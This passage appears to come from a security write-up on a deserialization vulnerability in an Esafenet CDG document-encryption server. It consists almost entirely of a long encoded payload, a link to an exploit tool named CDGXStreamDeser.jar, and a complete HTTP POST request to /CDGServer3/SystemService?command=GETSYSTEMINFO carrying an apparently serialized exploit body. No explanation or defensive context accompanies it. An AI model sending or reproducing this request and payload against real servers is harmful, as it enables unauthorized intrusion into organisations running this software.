JMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1704465942446-8888d388-070e-4fc5-b578-31729f3c0fa5.png](./img/Ee_yrEjypi5abc_7/1704465942446-8888d388-070e-4fc5-b578-31729f3c0fa5-763772.png)[CDGXStreamDeser.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1713621694456-7a7df27a-64ca-4263-a548-95e26a966195.jar) + +![1704466100552-562404fe-f385-49fb-99f0-dc58c369894a.png](./img/Ee_yrEjypi5abc_7/1704466100552-562404fe-f385-49fb-99f0-dc58c369894a-122353.png) + +```java +POST 
/CDGServer3/SystemService?command=GETSYSTEMINFO HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHHCPOCOLGKHOCMKILNFPJNJNDKKBHFIBMPOAPPBHJGLMDNMELIJGAGMEDAAIAKBOACALHCOMMJMEPMHDMAMOJOJCAPGBMMDLDNECINFJNHDJCFMFJHINNOAHKEDGIGEDKMLJFHEALCPEMAAEIMNGMPMMLHNJCMJFHILCLMEGEDEKEFIPFPNPMEBOMNEFEENHAAJPHGLDELDFIIHECHJOBFPJOJHLMELOHIIONFLCNKKNLKDCHGPHAACCPFECIMGFKHOGIMDEFPEFDGOBMJMJNBIICCONJOIGOKNIMLHCOKALPCBKLOPJJDODFKAMBMPFBJAEJFONBJKJEBJIJNPMLFMHDEICIGDJBMGJKAPDEJIMGECNAKHNJIHNGCLGLJOBFBECNCAGHLFDHCCCLEEOELOPCNJBHLKLOOJEEFHLDJKBEPBLDDJMPDCFEFGMOKJLKNEFLPLFOJMAONELNOMHKCJKMELHDKKBG
FJDNHHLFJGPLLINOCGBOHOJFBNMICJJAIBBEMOKENOIDIOLCMNPPDBKMMEIICBMNPCHBLOGGHPMNAFELCJPFJAGJMFKLHHPEFHNILEHJEGMPCKKACELLHGEBAFJFEBEGFDAGBNNFMEGMFNPHBMPALCFPAMJBNCOLDEKJOFGNGPOMODNJANPOPAHIBJPEHDHBLKOPJNGLIHCHONILIOBJFAOBMBAOPKKKDPGPEIBFMJNJCIBAJNKBJJDHDINEFPLOADFEJDNKNOCCHACNGLDCCNHMPLPDECKGNPHGMENKLIDPCNHHDDOGDBHPBOBMCLLFEADDOHNFHOBDMMPIJJAPHLNOHBJBLDGEMFPPNLFKBJLPFKBOHGAJGKIFKLIENLNKFIJBLKMPMAONDPMMLMLBKDMDEHNNFJIHEHACAFALGJEKBNOLPJJBOFOBNHADHOPFEPAEBOIANGLDNCIEDIBJKIEBNPBIBEAGHKHDCGOJFINLBMOMGEONNADMIBBDDKLOECOJKKKCODGIOPPLMKBLAEJKBELPJBICHBHAPGPFIHPHOHOCEKPMGDOGGHGLKEJOKLLOKBEFJEAAFGMNGBIEJPFFKELOCGLAPCFAPMKPOCKIOCFMJACHOFNBIGDOMHKFEGGEOKKPNAPKNOJAODCLMECCLBGEEHKEPBKBLDECNKAPCADCKAGMKMNGHLMPPKKAMCIECLGNFKCELDIJJEHPDFHELFIEBDCCGJFDMOBBIIBELMOMLBMPNABDLHINGECDPJNPHADFGKBGGDIJKIFDMBBCBEPNGOBICHICPEEIJEDHOEPCMMOLEBDPFNAPAAPAOKLEJDNCJJGCPMHLCJFDJMMEEIKIBMPDJJHKPNJAJMKDGEHMLKHOEKGHDMOPFOKKJMGIDDHHPKCBGLGPLLFMPAEKOOCGHKONEODICAKJPGNODMNLBFBKAHNHBDDPNMHOPLJOEEDHPGEJPGFBFGDFMALHEOGJODGOCKMAHFLBLPOLNOLHFPFNMPBCJGBHJCGPMNAFMJEJHGNPLONPLMCFMJIODDNLGLGFBONGJNKFOIGLLMINPABCNKMOHLMEMKHCGHEABKOFGANPKDICKCJEOHNIKNNLIKLBPJKDLFKKNLGINJOMCEPCNEHBIOFGJCILGDOHLCIMHAFPHNGFAHIOJEBMMKDOCAEBPOFJLCDMLLCDIJKLIEKFGGIDFFONPHGDJCFHGPGGIOLEJGDPIEFNGGJMPKIEAHLOGCOAJDMOKCNDPICFDILJLAMCLCHLBLJINBJNLGFCDIAJCNOCDNPHHACDLGBECEPBDEOIPNOAKLJIMKBJAPANFKNOKJBOGMINNCMOLFMGFFCDGPBAGDHJOIMHNPLDCKMEJGEMANOKDLPFBLGJKDBMBNLBOLCHHCPEOMBOJFMECMMJEBNPNOMNLLNLGBPNGAEHMDCFBMDMGPFPPGIKCCLAGEHFMCKODFDJGLNJEEJBDDIPMLEJDMOHBHJBFMNDLNEAANKMGLAGAJMPBIDJIKLBDBAFDNCOPDAHHOANIKFAENPBJHHKEKOLALMJMOLPAOKIMIEFEGIFIGMGKDBAMAPAKKNDFHKKBEEPNKBLJADFMONNHGKFPLDPDACPIPEJEMEIHFEAOALHGMPLOAINJNHCAGCJPFPDEBPEIDLEGFLFMFPCIMDBHCIDNKJALMKFLJOIBPIOGDHBDFOHBHLLEBHDFCLINHKNKIJGLFHGGKHJCNFCKKMJJJHFGPBPCJCLEAPPKLGGBJKALAFFJNPNIHLEMLOCMMICCAONNHGFDMBADMMGKNKLNEMEBHPJOFCJCGNKHGCELCDPPFNDPFMEOBJDGABEAAHNDCNIOAGPGEJKNMGACFMPIBBCFGJANKHJKMPCDKIPJDJKBGMLPGLJKBAOFAJHOPFKOFONJMAJEOJPEEPOEOJMBMAIIEKNOCCKNDLHJEJDDLOGMDMHFBCMIBJHNILHADHCFOALGKJMABFCLCJMBMHH
ABCLKCCAFDAFFDKCIJLPMDFGODMNAAPGGKCBIDAKCANGLLOLMNIBDNDEFPKLJBEKABHKMOGMBCAABEAHPEBGCCBFLCMGCBONJHGMNGIINNNEOIOPHDNGFLMCBLFDFLGPHNHOMGLDIAHILBEGEHAFGKHEAHPKBDMACGHMLAFDJMCPNAEMFLMOEJNCCAMENLKKLOHCNBICPGBALDODFNNOHBKEBNJAMKMPLGHNNCHPPPODONMGJDOOHOFBFGLBCOPLGHHHFANKKJCFCFHABEJBKJOEMOMCEMJKEDBMDPGGDPAPDNINEBFNMNOAHHDCPOIJALHJKPMAOEEEFIBIGFEBFFLPOPNILEFMEFODPELAJDAOKFJMCLOBAFMIAKDMONILOFLLDKCLOEDBFDMKLFEEDPPBAIKNBPFDEGCLMKKJAAFIMDIMCMHMKGBOAIAELIGDLDAONJOPMHCPEJPIJEALPFHOOPFEHCAANFPMAIBFFGCFOKIFDPJEKLEEMOHNAMCDHMIBCNGLNNHNDAEIDOEPMFDHPFOPCCMBNEHIAKAIGBBPGDNFDCHHCENJNNJAOHECAGEBBPNNMLKHHGNBMGKBAHBGKNEKMBEJKKCFGPAEOIECJIEAICKECAFBNELGHGAKPHLICHMCJIMHLHCJLMOMEJOOCDNEMIFFMMGKABHDMNOEAHOCMJGKAIBMJNPCKFNLIBAIDJAHHPFODGAJPLJPGGCAKEBNIDOKFMAGHCMKJGIOMIBKLIOCBGKBBPBCDHMJOCECOCHLKFPADDPCDNBKHNCNOJEOCEELAPIDLNHODKEJKDIHNMMJPONOEECGNGABNKAAEICDHCBKAPFPOFHANJIGLFEAKNOFBEMCGGPPHHJEHAADLJCDELDBOOLBBDCKKCMDKHPJLHADFBOBOMPCJHLNIFMEKILBJMPCHPHPBONCBHLIMKCPOJFNPJEMKNHPJFPHPCKLIBNGPCLFEIHKAFNAKMGFIKGGGBFKJFNOHAKNFIOGBGECNKBJCBONDCCMNEFNBIDNCBCNLBOMJCKMCLAPAMDNLOBPDLPAGADLDMIPLHDKCHOIFMDAEHAIGJJEEKAIDOPJEGFLKEADLMFDEILALOKFKJJIIGIHLIICBABKKOKDINACKLKAFJADJMLBHANCLBANMMJJPHCMHPGIDGLEKBEJLAPGALFAGILCLNNOKAAFGDGKCEJFKGEFOKHONNALPPNJKDJMPMOMPHMOCCMIHDBFLFPIPNGCJIEGCALCFLMJPDFOBINBDOFPCBKLAKHDALKGMELMKBFCILKIPCOOCPINAHLBCNIBMJCPNGCFHIGGEKEBLKMDPJGMDLIMAMJJJJLCAJPOIBDHAJDIBMKGNODGBPBAGBOJLCCOEKLLNLMHEAIBKJEPIFDADJGOCPPBIOEJEABPIHAJJHAEHPLICJGCIJMFNNKILHAEHPNLFMLOMKAPOBEFICJEEPELNKNEHJAPLEIFEIHACIJPJNADADPLNCNIFKCJMOKLMDOCNOPDJIMADDFGAOCFLHHHGFPGAHKFEMEEBHPDPEHGOFIEFPAKFDFAHGHFCIALKJNBGNPKGMHBGGNAOJHCDFJMNHKKEMCOEDOBAJLNPLONNIBOEAOCBGNIIPFMINMDBFKDJFMJPEPDPJELGBPJKFBPMGMGNINLDCKLINMPKICHFBBAJFJIGLGKMJAEDFPIPNHPODPDALMPOAACHAKDEIOBMLNEPOJPPGDPHIABMKOACEGMCIDMGEGLAJHKOHEMEIIIINECLHGHNDADPAOIJINCJFDBGCGPEONGGHADMACBLBGICPGCPPFCLJJPCOMHCNIMACBABJFANLOEBKCDJIJPKJGBJPLNJMHHINLFODLNNKJBDELCKKPKOAMGMOJIFJLGEBBIICMLCHFEAGPPEOIPAIKGDIIGLJIGOGILIDFCGBINOKOKDENEIDCCNOIJDGOJEBNGAPAPGGNIOFNOBJEJGBKKHGGCBKALFIDI
ICJEKLCLOMNGBHIMFJCOBAPDGHFLMKMGEOPMIEFKBFAJECPDPBMOOEHBLCHGGMPGAFLLOKHAKHPIJJBDOMPJGKJNCLOLIDFJHGCMKMNHKNIAFBPOCJANDEBLJGHNBJLDNJENIBLAIFFHMGILPFAIOPPBELDDIAEGPKAJCBADOIHDCEFEKHCMIMLPMDFCGNPNCBMGJNOJJHDKADFHBPDNKHOHFIIGCEMCKNHPNIPGLDHOFKNKMJIFPBLPCCLPKHGINGJJHPEGDKNDHCIEEMHJBBMDOFGNGKJLOJMCCAFCHCIHBABICCIDBEENCDGLPONGELHBNKIFAFMKCEAIKIABPDFJDBIDOKLPEAGMHOKBJJFOBJOGODHEBNDINHBMAGGILFAJFIAJEAFJBADJJGGAPOBAIBHMCCDJIBPIBFPPFBMBGGKEPPDBAMMJKKJBCOPPAKNBAKJGANLHEFOPNGEOIJAOMDLEIAICCEMJFOBHDBHEKHJJAMHIIDBNKAMIGDIILOGCMEHPEBAKBKFHHMOLNBFCDFJKKABKLKGOELAILCEHNEJADNLCNLIKEOMMOINMOFGBOPBADLCECJNNHNKBPONJDMPOCOBDAHIJPCFJGAGKFCODFNHDEIKGEGNNICLPIOJLPJBLKGOCOPOEJPJGFKINGNFIFNCPCHBHLDADPFIJDFEJLHMKKOKCAOKDGKLDJGLFIGPFNKHPMCBBBCNCAIEFKECBNPMGCPLBBLMHAKDLOCDEEIOENDCBMPBLLCHOFKFHICHEBCEFGNPLPLFDHIGLBNGCDAFMJGKOGNHJBKJNPLOIEKDMPLAAEPKHNDCGPAMFEMEFEDJLPFHMKPIIJLEMGPOEOPFHLBAPMNLANEJFBBEIMIGOBKHIKHAJABOCNDHOPPJEHGOJEPKGILEHEDGNEADBDDGKAJNDHEFKCLHIAKLJPNLINECHLFIKEBNHGHCEOKKOLHBILCKPJPEJDGPJIJLNMCALNFHDGCNDGBPAOFLFHKIHMONEOACJFPIABPNLJAELEENMOFGNHHCLDKHHBGMGPIDBKKHOIAODENJINGDNNFKFHPGMCCGOBPOFDKOMCIGMFKDNAHMKNCAMNJMFBGFJDGPOHAPGOHAPBHNFOKDFDFJJOCCNOAIGGMKPIGNECKJOAJANEDKNBLAGFMJANFHAOMMBHCOCAALLFMMEPCIHJCOGAMMEKJJHBPDBKJNPCPHIKBBLEAGJBCENBOMAHFAFBCJPFMGBHKLGNEIJBAKPLCEJLCCLEDHJMFABAPPOCCCOEODLILINJIDFEFBLEEMBNCFAIFAHKFLFJCMODFHIGEBLNMNPLIABOBNJIJKIHEILEIPFNMMJPCEPGEJHCCCGFLOMDGJGLILABCFOEMLDIMKAEHLCEMGBDFKANCPOBIELEGBCIAMPIPDFODNOJGMBCDKFKJADMNPPIFJGDOFAHLCOJAPPIANHNPNAKGBMEIGPMECNPCEFNKLPKMPOOGICCCJDDKHFEFGHCMFFMCCMAKEEDENIGENFIJECGKCMIBFKCDLOEPBPDDMNOPDBJJJONENDJINKOFEGONBHLFJDLMBKNBJFOJDFJBOAOIEBKPABFKGJODBCMBFENGKIHJOMOLKFNENGBPCPEKPJDKLJMKBMOCAOCDEFAOAFAOMEOEOCMHFPDEAIFHAMFKPBBHDIOMNFEOHHIDBAEMFMBJIIGOJNNMCEJEKIFINPIGONDKDFOGDDEHIDBDKNPAHJKEMLNCBIJCIGGJEJFFNIIBLFLAOJNBENJFEHAGIOCHCLDOOFGNNPOLHKICFCMLADDDELAOADCKIEEOIJJHDJINIHLEDBKLNOBOIEBDGJHMHLMFPEFLDDINLABNPDOECAJOMDIPHMMINAJKJLOFIEBCOABHGLKCAEKPLCAHAEGBIJHKJFBHPIABLMNJMGLBGADNJELENPBAEHPFAFPECEJOKKMIFFNMJAILCEMKOIDPMAGBFILAJGMKCK
KKKOBJOOENKEEDNMAHOGDCNJEOEGPAHMKHEGCHDFJDCNPJCPPOBKBFIHCOJLODBLGEKMKLGAEFLBMABAPLDFIBHNKFINKMBCKCFLHEIONHGOCKDMMJGDIFEEPLKGIFNHLNECLGJEIFGDABGAGBAJMMMFNNFHAFPOGMABEMHGOACOAKPEOOCIDMECKGPGPEPPLDGHFNNHODIFMPELPHLFGPPKLCKAFNDOBPHAGMDCOBNECJODJMCMLPMDEDCNBKGEONLKGIFEBIIEEOJEGPIKIEPFHFGBONLCDNCGOCHCFNNDBLCIJHLJLJPIJKONCMCODJIDKODMJNKFBALFPFONJAALEJHALJDEDEODCBBBMNMBFDJHCNCGNJOKLEGINDPMPNEJFDNLNABILNPBHEEJBDACLMBMNBDOBJLELKILJILMLFIPMDEIMKOFCIBKBKFMNPKCLBFIIPDFNJOLLLMIJHCAPDFCGPFGHIJPGHHOKIDLMBPAMPAKFGINAPPDBPDIBFFJHMGIJDHDBLAAKOIINLLJKDKCJPOPPJJFLOJIGIMBHGGFHJBBFCFBPEKFIHNGJIIOEHLMJODDEPOANGCNILFHGBLMIIGDPKNHIIADBHGNAAPJMHGKIFHJLBOCJCFDFGJGJONNACBOJHOPKGNJCBJDNHJAJJKBOEGHDHNLOBLMEHABPJAOMIOHPHKFCHEMBJEABJIODDKEDNIMFHMFDAAFHAFJJLKLCOJICFEHIAEGJJONFBLFLAPEKKJMDNPKODGFLJCKLOLOCOIAMJHFCDNCLAODMCNBMMLHMBLELJANAJNFPDDJKENDEJEKPFOEBGNOHIINGBOFDKJKPKDDPJOOFHGHLKEKNNBKBCMCGMFPBKMIAGHFPONFAEFBNFIPKPGCMPCFNAJKDLPOOHACKHDDPEMNHLHPHEBNDGNCLMDDKLAOMJFCIBAEENPEBKKAFAJLLFEMOGGMHOBNEMMJFIHCFHAMFJNFHDLJPJNMIJIMPLGCEGNGEEDAGIIOBILKNANGCBKLKNPDNINGKFELLKBNLGCLGJCABHJKPBFIKJBMFDEPDLBBGJFOMMDENJNOEIDHLKCFLELKGCNGHALAMEKFCONOEJEKIIEGDALFMMEPEPFENMLJMEHLPOBGPEBDHJOLOOAHPCNMOPFOAFLHKGFEIGEOFICANPLJFOOPJCFPBHKNEGOIGDGIFGDJDLLODOJAAOLEIAKEFBKPDGONECMJKEKNCCJCLLGIPEMEKICHMMOMGELMCDLAIAAONDGGPMCDJIOBAENCJDBLECJONDFHDDOPGJOMFAADIIMPIECNKPPCAJALGDJCAKKLJDBNLONHPFDFNABAKAEPGLFCOIGDOFPFIOFJCDDFGFAEAPJKPOAALKAMDFCCIPHLJLMEHNGICAHJKCBFNHGPPBMGNNOBAGKBGHHGBJJNALBBACGCEIIKHFEAEGJABGCHBJDPGGHAONLHKMLMMBKCKGIPJLLFAHPAOBPDKDKGLJEOOIHAEGMJHGBGBLKNGKGHACOCBHKBIMFJDHHMGCCEGMHOFNNFMFNKLJOLGNFJAJECFAFEPKEOBDANNGIBAODHNIFDEOBAOBEIHHIICHJDHFJJKDMNIHGPPDENFIGNFMDFDMNOPHOMFNAFHAPAAKJMHIMBBDIMEFLICACIFNHOPHBDNDJGBDNOPDKJKBAAOPHMHNPIAEBEBEGJGCGMAEBPCAMNGOFHLLFOOOBFABKAAAEDHGJPGBHCDAOIPEACIHHIIJCJDCIGKLNAFMFAIMDAILCPBCCHIKJGNFJHNJGIJHKNBKJJNPMMGBGOIKGAHLDPBAGEBJDAGBPHFPBIFJPLLBACBHKBMBGLNKHPANHLFFIALGEPAKIMDMIGPCGCAIGHLHLKDPPDICFIMJKEGEMPMCKGAJHCOFKFBAHDLHEANCMKLGKPDADDMPLFKFNJAOEBMHNPHEMLCECKGPPDGFJGAPOHGBIHLOJBCGNOMMJL
HCCGELDLCJMKMCGHNJHFMJBPOPOKJOPKJIFOJJMBCPNMKEJJOPFBIDFPIJCGEOKNILKDFJBAFLFCDPHONAKNJHOJLBBNKNLPAIFHMLFNIDLEJHBHKCAMMHCJFGMAFMGAPJPNCHPPGGIJMAOKKACLNPJGODKMIJEGMKOGDCBDKAGGCAELJOGFIBGHFOAKMBBDIBEAJIPHOPBFDBCAAHCMALCBMHHLFCIAMHLLGHKAKAPMEGJGJKJLMLJFODPNIAABGCGIPFMEJEIJELDNPLFNEPCMFEDGBLHPFNMHHOGMKCDKOGBBFFOCAGNMBKNAJFKCFPMLELOIPKCAKCMOCECKOJBNPEJEIMLPCFGEAODKFFIDINDJOGFLDDNFDBFHJCCAAKDMOIHKGLLOKHBEKBEAKBJJPOEFOPPPLGJLDKNIGLMAOILJMMAAGCIMADPOFOJOADICNJPFCJJFMFGCMAANMFKHJOFEFPHIAMCPJHBBLOCNCNFKCCMKCCNADKNDAGKNNDGOHODDMMGCNJBNPMAEBFOCPICCDHNHGMFAOJBFOKNHONGKIENCLCMFMECLCJDBMMJPHGHIOIBNICNAIKAOJEMDHOKOCADKAPGDMAMIAIMMIEDIAAEPJGEDKOACOBHOLBODOAHNHNICICJKMOHAHJOJGEGDGANFIEPICLHKPKHNFPHNLAMIMJNKFKLFGEBLNANEPEEBHOGDHHCGECLGJDNCCJAKANGDKCGMGIBAHIMMHKIJKHCGGHDBKMDDIABOOCECNNMHFIPPCLNPCKIHAJNDDBJICEBPPKJPJFMDEJMDDLOPHBGFOENOEIPAABDKFFKKOMAKHFBMPCJPJJLDMCPBIDKBLIPJFNDJFHBCBCPEACBGFJABNONJKGLCKADMHPBKCLOIIGPBCOPBBBPIFMAMGFIPHGBFHHMLDKAOFGJKAJMNHKOIBBHCIEEOLJEGLACOHABEPCEIPLAEDDFOJPBCAFFIFMIHDBGGEFNDMJEFIEILIJMJKCAOIKNIIOMMKEBKBFHGIMBLFJHJLIHNKDEDGMAAIEALOGNBIGFHAKPDJNPMMDFOBDHKJPICMKGBGEAKFKDHJNNKKICEHHCDOAEDDINCPKMIGLJEGGIFOLJAJKGGOKGKEOCHOIMOKPCOJHDLDKDGBKKHKAMPJGLECHDJOGMFHMLIDEKGKEIBNIEFAMHMEEGOCNLBPCCMDLOMIGGALIHJKBPMEAJJLIBKPIHDOKINFEKFGKCDPHJJBDNOBHGHAAPCNAAIALHECIIOIJGEINCIFMIMJCDGMNEAFCCKBFKDEAIPCNBOGMNMMENPJEAHKJHJBOPAPCIOPBOBGABBGKIOJPBKNPJGEINJDJDHCHMMKHMHBHCDPAONJDABFHBFJKHPJPMBMDHODGFMICNNHNDNKAOPMAHIPMLPNJMBJMKMKGFIMHMBEKAFHBJMFNNAPHNKPPFFAGHGJLLADGPKNCDIPJHHIKCPHJIOEBADJJHHNOPGBHIPNIGEGGMGIPJJIKMAEDCFJHGENLOKJCLPPAAMNJMAHMENAIKKKHKOOBAIJDGMCFLHKJOMAHKFMFGDBAKCKPACAPEEGIIHMGBJGDKEFHFCNNIHPKOMFJAJIOJMLNMNJDDMMKIMHFGNCDDJNOKDECHKIFDHFGMJLIFBGDGEEOCCDFIAOFFALFMELHIEDADGIEHLKJEIGFMOLIDHLHAKBHPLMEMLFKDJJCJEHGCHBIPKDEDANEJEJFEKBCICGMNINHFILPNAABDPPGDIAHOMICGGBKGJGNADBGDFDPKIMIKPKGINHLDOABEJJOBNGPOAGAPKPDAAAHNNIEMBJJNFIMMHGMOGLNIPIJLKFLNBFCCDLMNHCBCNOAFPOPJCLAPEIPDHGAPNJDJPFJPPAGKAFFBCOFLKGHKMLNEKKOGANEJDOEMHCNFKCFHLDMAHBBMEEMBGLDAIIIBBDFEKLHNGLOOHBCNGKPEPDNJNFDNOJGKGKFBJ
MDJAEJHPGKJFKPGABEIPCLJKHJJIIKDNMHPIBLFFGLBHLFIFIDHLPLAAMGMEPLJFDADHLOCNICPCJMDHBCEODDJLGGBGKBJDDALMGCNMNKNGCDMLFPFICCDBBGLAOBKAFEEIMIHEFJFJNJMKOAOBDILACOCLBAJBIIHAKAKHKDLKNDOEEKFEFIHNKLGELOJFJONNJBOLNMLJJKPDOGGAAPHJCLOPNCLCLCAAAOIHDDBPFMBOFCNBJEJKPDBFIMPDACFBEKMGDLLDGMCECHBLKPLHFNMLOOACLPPHNGKEKLGFNBDDJMFOKPAMDAJPHFJNGFBJMADFJJLPOMLNBDPAMMDEDHBAOOLMIMMKEEEIHJBHJNLHGMHGBADFKDIPHIPDHINPFFMFDKEPNLHIFLMIIDGAPKIPHNGCBJIKCBNPPGHJLOBBKKEGAIIMAFOMOLBOCFNHILNOCOJHJGBFJNFNPIDOIPPLMFDJGBNIPCAGOAHIKHHKIKKHJBPBOKPPAIEFHIABOPNJOOFGDMKCLONNGPCHCKAAMEKHOIMEBFHDIOOKNLDJLDACMAEPHLJPIBNBJJCACFHJELGIPLDKLICMPJKFEEMMIGGMMBGFGKNDKJGFJOIECIGLDOFCDGGOFNLEPJPMCNAGOKOOJENDAFKGMINLPFDIABIBBIPIKLCCHFOJJFCAHJMLEPKNNDILCIHGGEDJNHDPGLLFELBEFNEIHDHIGHIKKJGIDFMCIGNENIONLEBLCGIINOBDNJEBPINJMEGGMOLGDKLOCBIKGEDMDFKKBBEFFMHJOCKBIICAICNBHLOKJNIPJEDPKJKLANCIHNGLHGBDIIBCJHJDEKIFAOIIPCGEALAJFJDOMGNKILGDADCHDOKGCOLAOOBJCKHLKBKNIAMLLGJKDIGBKMPEONHEEJPPFOHJELOEJMIDMACGFLFGHJBBDLEHMAELDCDNPKNIFEJCCEEPIPDCJGGFGFKKFGIAGMAFPKNKHPDKANOBPPPHBEMDMDAEBKKPNNLJEFHDMEHJJOPFFFOCLDMEBKMHBCONGKOAGCCJDDBKPGKPBCNAJMCAMOFJOHLAPJOJODJBCAAPIMCKBMMHNDKBILHOCNLLFMDOJAIBOBMMABIKHIPFAMHJLJFEPFAKBHGIKFBIHCMFMALAIILOMBBOEDEGMJBOODGHBLENNDANOCJLGNIBKNODFABKOINJIPPFAABAEALBPKPNJPIOCDNIODIIBLOAIDOKHKBKHGOKPEEMOMKHJJOKJBFMKFMGONJONLOHLIKPFLDFEAECKAINOCFFKPMPCJNCPPCBJEDGJFBDKPBJJMGOODEAAEKAJJHMNCAHELKIFAFGNKMJHFDBNOLAGFGCDEPLCKECCEDBCBKOFKODBMAFMACKMGFELDFNNLMDCGDDAJOEGNHODFABGHJJGFLMHPPIJKCFLDJHLGLLHFACECLCILFLGCNLKFCDGHJKNIKDOCGLKMEGNACIENNLLHJBLDGNGFFLPFMKHIOMCHBJJGKFJLFPCMBPFBPNLMJOEDJKFGILGJNMNJOMPCAGJJOJEEEFJCHJDFAFDIKBBEHIMDJDHPEJMADOELCCPCPNOCAIOADDFBIBOMABMMGHFKLINMJNEOIJKMGHCHBFGGHNGLNNEFLABIPCANFIBGAMMLAHHODKPKEAOIODECBMCFOPLFAOCCIILIBGAHENHHBFDEEGHBFGFDDPFGCGGBFONNNIKBINGOLFHLFLFDKHEKIJIBMFADKABHDKPGDCDPKCNLBACFPEIBCOCNAEKCJCCMLKFJAPILBMLPCKENMINJHABEOBPODAOJFLACNNGMBNDJNAFNKJCLDBMGAIKBENIJHBFMLAJHHOPKNKPLPKCDANFFDGJAHCNOEIKGEEMJHBEIJNNIMCCJDIHIFIAPLHCOOMLNLGKFDPHPKEDFCIIEGLOLDNJJHAHHNJHJCIODEJKCCPMIPPPOINLKJMMOBIGIELPMHANCGH
EODFFCANBOKBBDAANHPFAOJCHNCILCMLGBJHOBHCOIKMACBHGPBBIHDLILCKLCPEAECJCAJFNEFNIALMJMOLLDPIEPHDFLFMPNKLGNIMCIBKMHBBNCNAAGOBMCNJEOEAHFHDOCHEDMPIBGKDJIMKFAHMFLANDKKPCMODAGMEDIGFALOCFBHDKJFFOGMOFGKIGAHJCNPGMDOGMFPPMNBKEFMKLJCKNGLPPMFJLPNIIBODGMIPGIEOEFLCLEBIAEFKLOGNOGPFNMBBEPCGKLNICKBFKNLPPCECLIOLEPAAICMDNMACFHMDPCJKGACIPEDIGFIKNEEHEHIIJFJAFICBPODCKJMIGCIEBNCNFCALKAMPAPGDHFPBKPFECCFGMCPFAOMLDCJNNPEDDFFENLCGGALHKDCFACEGPDBNKAEKJGCHAEMMCGLCGPNCNBGEABNJNBIPEBKMANCOBLICEOECIDENPFNLMCBPONBEHCGFHMPPCNMEKBOCOCMKIEKCPEIIGDKJAHGFFMNFIKKIEFBPOJPKCPCNIHKHNPNJLJNLPNGPIBCCFEIKBDOMJPOGBLKEOGECBEGKFIDJMPDOEENFHAJFBIICLJKPJEMGDCGLLKGHMJKAPNLMILHAONANNNHEEDDEIJENEKIHDCKBBMAMLJLFIEIAFLAMPDMNJOHKJPGCLAPAJPMKFEPCANBHLPKMALBAANCOJBNJDIINODLPBIPMEBAIMJPPGJKAHFALGJAHBPPBHKDAIKPNHBCBCKIFOBDFBHGNFCAMJNNAFCJCPOFLGOGCEOOPIFOIBBDHHFLMLBJDJLIJHPNOGLIDNCLFDIKEGABLBNBLMEAHKCJJIPGGDIINFEENMAFFEKOKIPBCBFLMCHAGBFFD